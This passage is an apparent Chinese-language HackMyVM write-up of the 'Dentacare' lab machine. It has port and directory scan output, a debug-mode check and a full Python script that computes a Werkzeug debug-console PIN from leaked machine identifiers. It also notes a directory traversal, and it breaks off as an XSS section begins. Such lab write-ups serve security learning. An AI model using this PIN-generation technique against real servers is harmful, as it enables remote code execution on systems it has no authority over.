{"id":685,"date":"2024-05-28T21:02:04","date_gmt":"2024-05-28T13:02:04","guid":{"rendered":"http:\/\/162.14.82.114\/?p=685"},"modified":"2024-05-28T21:02:04","modified_gmt":"2024-05-28T13:02:04","slug":"hmv-_-dentacare","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/685\/05\/28\/2024\/","title":{"rendered":"hmv[-_-]Dentacare"},"content":{"rendered":"<h1>Dentacare<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101678.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101678.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528145900670\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101681.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101681.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528183651591\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/dentacare]\n\u2514\u2500$ rustscan -a 172.20.10.4 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 172.20.10.4:22\nOpen 172.20.10.4:80\nOpen 172.20.10.4:8000\nPORT     STATE SERVICE REASON  VERSION\n22\/tcp   open  ssh     syn-ack OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)\n| ssh-hostkey: \n|   256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLuHH80SwA8Qff3pGOY4aBesL0Aeesw6jqX+pbtR9O7w8jlbyNhuHmjjABb\/34BxFp2oBx8o5xuZVXS1cE9nAlE=\n|   256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICKFE9s2IvPGAJ7Pt0kSC8t9OXYUrueJQQplSC2wbYtY\n80\/tcp   open  http    syn-ack Werkzeug\/3.0.2 Python\/3.11.2\n|_http-title: DentaCare Corporation\n|_http-server-header: Werkzeug\/3.0.2 Python\/3.11.2\n| http-methods: \n|_  Supported Methods: GET HEAD OPTIONS\n| fingerprint-strings: \n|   GetRequest: \n|     HTTP\/1.1 200 OK\n|     Server: Werkzeug\/3.0.2 Python\/3.11.2\n|     Date: Tue, 28 May 2024 10:37:48 GMT\n|     Content-Type: text\/html; charset=utf-8\n|     Content-Length: 43069\n|     Connection: close\n|     &lt;!DOCTYPE html&gt;\n|     &lt;html lang=&quot;en&quot;&gt;\n|     &lt;head&gt;\n|     &lt;title&gt;DentaCare Corporation&lt;\/title&gt;\n|     &lt;meta charset=&quot;utf-8&quot;&gt;\n|     &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1, shrink-to-fit=no&quot;&gt;\n|     &lt;link href=&quot;https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,400,500,600,700&quot; rel=&quot;stylesheet&quot;&gt;\n|     &lt;link rel=&quot;stylesheet&quot; href=&quot;..\/static\/css\/open-iconic-bootstrap.min.css&quot;&gt;\n|     &lt;link rel=&quot;stylesheet&quot; href=&quot;..\/static\/css\/animate.css&quot;&gt;\n|     &lt;link rel=&quot;stylesheet&quot; href=&quot;..\/static\/css\/owl.carousel.min.css&quot;&gt;\n|     &lt;link rel=&quot;stylesheet&quot; href=&quot;..\/static\/css\/owl.theme.default.min.css&quot;&gt;\n|     &lt;link rel=&quot;stylesheet&quot; 
href=&quot;..\/static\/css\/magnific-popup.css&quot;&gt;\n|     &lt;link rel=&quot;stylesheet&quot; href=&quot;..\/static\/css\/aos.css&quot;&gt;\n|     &lt;lin\n|   HTTPOptions: \n|     HTTP\/1.1 200 OK\n|     Server: Werkzeug\/3.0.2 Python\/3.11.2\n|     Date: Tue, 28 May 2024 10:37:48 GMT\n|     Content-Type: text\/html; charset=utf-8\n|     Allow: GET, HEAD, OPTIONS\n|     Content-Length: 0\n|     Connection: close\n|   RTSPRequest: \n|     &lt;!DOCTYPE HTML&gt;\n|     &lt;html lang=&quot;en&quot;&gt;\n|     &lt;head&gt;\n|     &lt;meta charset=&quot;utf-8&quot;&gt;\n|     &lt;title&gt;Error response&lt;\/title&gt;\n|     &lt;\/head&gt;\n|     &lt;body&gt;\n|     &lt;h1&gt;Error response&lt;\/h1&gt;\n|     &lt;p&gt;Error code: 400&lt;\/p&gt;\n|     &lt;p&gt;Message: Bad request version (&#039;RTSP\/1.0&#039;).&lt;\/p&gt;\n|     &lt;p&gt;Error code explanation: 400 - Bad request syntax or unsupported method.&lt;\/p&gt;\n|     &lt;\/body&gt;\n|_    &lt;\/html&gt;\n8000\/tcp open  http    syn-ack Apache httpd 2.4.57\n|_http-server-header: Apache\/2.4.57 (Debian)\n|_http-title: 403 Forbidden\n1 service unrecognized despite returning data. 
If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port80-TCP:V=7.94SVN%I=7%D=5\/28%Time=6655B3FB%P=x86_64-pc-linux-gnu%r(G\nSF:etRequest,A8ED,&quot;HTTP\/1\\.1\\x20200\\x20OK\\r\\nServer:\\x20Werkzeug\/3\\.0\\.2\\x\nSF:20Python\/3\\.11\\.2\\r\\nDate:\\x20Tue,\\x2028\\x20May\\x202024\\x2010:37:48\\x20\nSF:GMT\\r\\nContent-Type:\\x20text\/html;\\x20charset=utf-8\\r\\nContent-Length:\\\nSF:x2043069\\r\\nConnection:\\x20close\\r\\n\\r\\n&lt;!DOCTYPE\\x20html&gt;\\n&lt;html\\x20la\nSF:ng=\\&quot;en\\&quot;&gt;\\n\\x20\\x20&lt;head&gt;\\n\\x20\\x20\\x20\\x20&lt;title&gt;DentaCare\\x20Corpora\nSF:tion&lt;\/title&gt;\\n\\x20\\x20\\x20\\x20&lt;meta\\x20charset=\\&quot;utf-8\\&quot;&gt;\\n\\x20\\x20\\x20\nSF:\\x20&lt;meta\\x20name=\\&quot;viewport\\&quot;\\x20content=\\&quot;width=device-width,\\x20init\nSF:ial-scale=1,\\x20shrink-to-fit=no\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;link\\x20href=\\&quot;ht\nSF:tps:\/\/fonts\\.googleapis\\.com\/css\\?family=Open\\+Sans:300,400,500,600,700\nSF:\\&quot;\\x20rel=\\&quot;stylesheet\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;link\\x20rel=\\&quot;stylesheet\\&quot;\\\nSF:x20href=\\&quot;\\.\\.\/static\/css\/open-iconic-bootstrap\\.min\\.css\\&quot;&gt;\\n\\x20\\x20\\\nSF:x20\\x20&lt;link\\x20rel=\\&quot;stylesheet\\&quot;\\x20href=\\&quot;\\.\\.\/static\/css\/animate\\.c\nSF:ss\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;link\\x20rel=\\&quot;stylesheet\\&quot;\\x20href=\\&quot;\\.\\.\/stati\nSF:c\/css\/owl\\.carousel\\.min\\.css\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;link\\x20rel=\\&quot;styles\nSF:heet\\&quot;\\x20href=\\&quot;\\.\\.\/static\/css\/owl\\.theme\\.default\\.min\\.css\\&quot;&gt;\\n\\x20\nSF:\\x20\\x20\\x20&lt;link\\x20rel=\\&quot;stylesheet\\&quot;\\x20href=\\&quot;\\.\\.\/static\/css\/magni\nSF:fic-popup\\.css\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;link\\x20rel=\\&quot;stylesheet\\&quot;\\x20href=\nSF:\\&quot;\\.\\.\/static\/css\/aos\\.css\\&quot;&gt
;\\n\\x20\\x20\\x20\\x20&lt;lin&quot;)%r(HTTPOptions,C7,\nSF:&quot;HTTP\/1\\.1\\x20200\\x20OK\\r\\nServer:\\x20Werkzeug\/3\\.0\\.2\\x20Python\/3\\.11\\\nSF:.2\\r\\nDate:\\x20Tue,\\x2028\\x20May\\x202024\\x2010:37:48\\x20GMT\\r\\nContent-\nSF:Type:\\x20text\/html;\\x20charset=utf-8\\r\\nAllow:\\x20GET,\\x20HEAD,\\x20OPTI\nSF:ONS\\r\\nContent-Length:\\x200\\r\\nConnection:\\x20close\\r\\n\\r\\n&quot;)%r(RTSPReq\nSF:uest,16C,&quot;&lt;!DOCTYPE\\x20HTML&gt;\\n&lt;html\\x20lang=\\&quot;en\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;h\nSF:ead&gt;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20&lt;meta\\x20charset=\\&quot;utf-8\\&quot;&gt;\\n\\x20\nSF:\\x20\\x20\\x20\\x20\\x20\\x20\\x20&lt;title&gt;Error\\x20response&lt;\/title&gt;\\n\\x20\\x20\\\nSF:x20\\x20&lt;\/head&gt;\\n\\x20\\x20\\x20\\x20&lt;body&gt;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x2\nSF:0&lt;h1&gt;Error\\x20response&lt;\/h1&gt;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20&lt;p&gt;Error\\x\nSF:20code:\\x20400&lt;\/p&gt;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20&lt;p&gt;Message:\\x20Bad\\\nSF:x20request\\x20version\\x20\\(&#039;RTSP\/1\\.0&#039;\\)\\.&lt;\/p&gt;\\n\\x20\\x20\\x20\\x20\\x20\\x2\nSF:0\\x20\\x20&lt;p&gt;Error\\x20code\\x20explanation:\\x20400\\x20-\\x20Bad\\x20request\nSF:\\x20syntax\\x20or\\x20unsupported\\x20method\\.&lt;\/p&gt;\\n\\x20\\x20\\x20\\x20&lt;\/body\nSF:&gt;\\n&lt;\/html&gt;\\n&quot;);\nService Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/dentacare]\n\u2514\u2500$ gobuster dir -u http:\/\/172.20.10.4\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt            \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     
http:\/\/172.20.10.4\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/blog                 (Status: 200) [Size: 23021]\n\/about                (Status: 200) [Size: 22975]\n\/contact              (Status: 500) [Size: 27322]\n\/services             (Status: 200) [Size: 21296]\n\/admin                (Status: 302) [Size: 189] [--&gt; \/]\n\/comment              (Status: 405) [Size: 153]\nProgress: 3573 \/ 220561 (1.62%)\n[!] Keyboard interrupt detected, terminating.\nProgress: 3574 \/ 220561 (1.62%)\n[ERROR] Get &quot;http:\/\/172.20.10.4\/Desktops&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/172.20.10.4\/newyork&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/172.20.10.4\/termsofservice&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/172.20.10.4\/530&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/172.20.10.4\/az&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<p>\u626b\u4e0d\u4e86\uff0c\u53e6\u5bfb\u4ed6\u6cd5\u5427\u3002\u3002\u3002<\/p>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101683.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101683.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528184119391\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u5b58\u5728\u7591\u4f3c\u57df\u540d\u89e3\u6790<code>Dentacare.hmv<\/code>\uff0c\u5c1d\u8bd5\u8fdb\u884c\u914d\u7f6e\uff1a<\/p>\n<pre><code class=\"language-apl\">172.20.10.4   dentacare.hmv<\/code><\/pre>\n<p>\u67e5\u770b\u5176\u4ed6\u914d\u7f6e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101684.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101684.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528184454756\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<h4>\u6846\u67b6\u6f0f\u6d1e<\/h4>\n<p>\u5148\u67e5\u770b\u4e00\u4e0b\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/dentacare]\n\u2514\u2500$ 
searchsploit flask 3.0.2             \nExploits: No Results\nShellcodes: No Results<\/code><\/pre>\n<p>\u6682\u65e0\u53ef\u4ee5\u5229\u7528\u7684\uff0c\u5c1d\u8bd5<code>google<\/code>\u4e00\u4e0b\uff0c\u4e5f\u6ca1\u53d1\u73b0\u5565\u3002<\/p>\n<p>\u67e5\u770b\u4e00\u4e0b\u662f\u5426\u5f00\u542f\u4e86<code>debug<\/code>\u6a21\u5f0f\uff1a<a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-web\/werkzeug\">https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-web\/werkzeug<\/a><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101685.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101685.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528184842078\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101686.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101686.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528184829657\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u786e\u5b9e\u5f00\u542f\u4e86\uff0c\u7b49\u4e0b\u53ef\u4ee5\u5c1d\u8bd5\u5229\u7528\u4e00\u4e0b\u3002<\/p>\n<h4>FUZZ<\/h4>\n<p>\u5148fuzz\u4e00\u4e0b\u57df\u540d\u53ca\u76ee\u5f55\uff0c\u4e0d\u77e5\u9053\u6709\u65e0\u53ef\u4ee5\u8fdb\u884c\u5229\u7528\u7684\uff0c\u4f46\u662ffuzz\u4e5f\u88ab\u62e6\u4e86\uff0c\u592a\u6162\u4e86\u3002<\/p>\n<h3>8000\u7aef\u53e3<\/h3>\n<p>\u5c1d\u8bd5\u770b\u4e00\u4e0b\u662f\u5426\u5b58\u5728\u6709\u76f8\u5173\u51fa\u8def\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/dentacare]\n\u2514\u2500$ curl http:\/\/172.20.10.4:8000\/\n&lt;!DOCTYPE HTML PUBLIC &quot;-\/\/IETF\/\/DTD HTML 2.0\/\/EN&quot;&gt;\n&lt;html&gt;&lt;head&gt;\n&lt;title&gt;403 Forbidden&lt;\/title&gt;\n&lt;\/head&gt;&lt;body&gt;\n&lt;h1&gt;Forbidden&lt;\/h1&gt;\n&lt;p&gt;You don&#039;t have permission to access this resource.&lt;\/p&gt;\n&lt;hr&gt;\n&lt;address&gt;Apache\/2.4.57 (Debian) Server at 172.20.10.4 Port 8000&lt;\/address&gt;\n&lt;\/body&gt;&lt;\/html&gt;<\/code><\/pre>\n<h3>\u5c1d\u8bd5\u7206\u7834pin<\/h3>\n<p>\u5c1d\u8bd5\u4e00\u4e0b\u8fd9\u4e2a\u811a\u672c\uff1a<\/p>\n<pre><code class=\"language-bash\">import hashlib\nfrom itertools import chain\nprobably_public_bits = [\n    &#039;dentacare&#039;,  # username\n    &#039;flask.app&#039;,  # modname\n    &#039;Flask&#039;,  # getattr(app, &#039;__name__&#039;, getattr(app.__class__, &#039;__name__&#039;))\n    &#039;\/opt\/appli\/env\/lib\/python3.11\/site-packages\/flask\/app.py&#039;  # getattr(mod, &#039;__file__&#039;, None),\n]\n\nprivate_bits = [\n    &#039;279275995014060&#039;,  # str(uuid.getnode()),  \/sys\/class\/net\/ens33\/address\n    &#039;d4e6cb65d59544f3331ea0425dc555a1&#039;  # 
get_machine_id(), \/etc\/machine-id\n]\n\n# h = hashlib.md5()  # Changed in https:\/\/werkzeug.palletsprojects.com\/en\/2.2.x\/changes\/#version-2-0-0\nh = hashlib.sha1()\nfor bit in chain(probably_public_bits, private_bits):\n    if not bit:\n        continue\n    if isinstance(bit, str):\n        bit = bit.encode(&#039;utf-8&#039;)\n    h.update(bit)\nh.update(b&#039;cookiesalt&#039;)\n# h.update(b&#039;shittysalt&#039;)\n\ncookie_name = &#039;__wzd&#039; + h.hexdigest()[:20]\n\nnum = None\nif num is None:\n    h.update(b&#039;pinsalt&#039;)\n    num = (&#039;%09d&#039; % int(h.hexdigest(), 16))[:9]\n\nrv = None\nif rv is None:\n    for group_size in 5, 4, 3:\n        if len(num) % group_size == 0:\n            rv = &#039;-&#039;.join(num[x:x + group_size].rjust(group_size, &#039;0&#039;)\n                          for x in range(0, len(num), group_size))\n            break\n    else:\n        rv = num\n\nprint(rv)<\/code><\/pre>\n<p>\u5148\u627e\u4e00\u4e0b\u662f\u5426\u5b58\u5728\u76f8\u5173\u4fe1\u606f\u7684\u5185\u5bb9\uff0c\u627e\u5230\u51e0\u4e2a\u7528\u6237\u540d\uff1a<\/p>\n<pre><code class=\"language-apl\">green\nadmin\ntom\nmark\nmark\npatrick\nlvan\ndentacare<\/code><\/pre>\n<p>\u7136\u540e\u627e\u5230\u4e86\u76ee\u5f55<code>\/opt\/appli\/env\/lib\/python3.11\/site-packages\/flask\/app.py<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101687.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101687.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528194649962\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u8fd8\u53d1\u73b0\u4e86\u4e00\u4e2a\u76ee\u5f55\u7a7f\u8d8a\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101688.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101688.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528191217507\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101689.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101689.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528191249822\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>\u4f46\u662f\u5176\u4ed6\u7684\u6587\u4ef6\u65e0\u6cd5\u8fdb\u884c\u914d\u7f6e\u8bfb\u53d6\u3002\u53ef\u4ee5\u53c2\u8003<code>zeug<\/code>\u9776\u573a\uff0c\u5c1d\u8bd5\u8fdb\u884c\u7834\u89e3\uff0c\u4f46\u662f\u6211\u8fd9\u8fb9\u5077\u770b\u4e86\u4e00\u4e0bwp\u53d1\u73b0\u4e0d\u662f\u8fd9\u4e2a\u601d\u8def\uff08\u8fd9\u4e2a\u601d\u8def\u4e0b\u7684\u9776\u673a\u53ef\u80fd\u9700\u8981\u91cd\u65b0\u5bfc\u5165\u9776\u673a\uff0c\u4fee\u6539mac\u5730\u5740\uff0c\u5426\u5219\u5373\u4f7f\u53ef\u4ee5rce\u4e5f\u51fa\u4e0d\u6765\uff0c\u6240\u4ee5\u6211\u5c31\u5077\u770b\u4e86\u4e00\u4e0b\uff09<\/p>\n<h3>XSS\u8fdb\u884c\u5229\u7528\uff08\u6b63\u786e\u601d\u8def\uff09<\/h3>\n<p>\u8fd9\u786e\u5b9e\u6ca1\u60f3\u5230\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101690.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101690.png\" 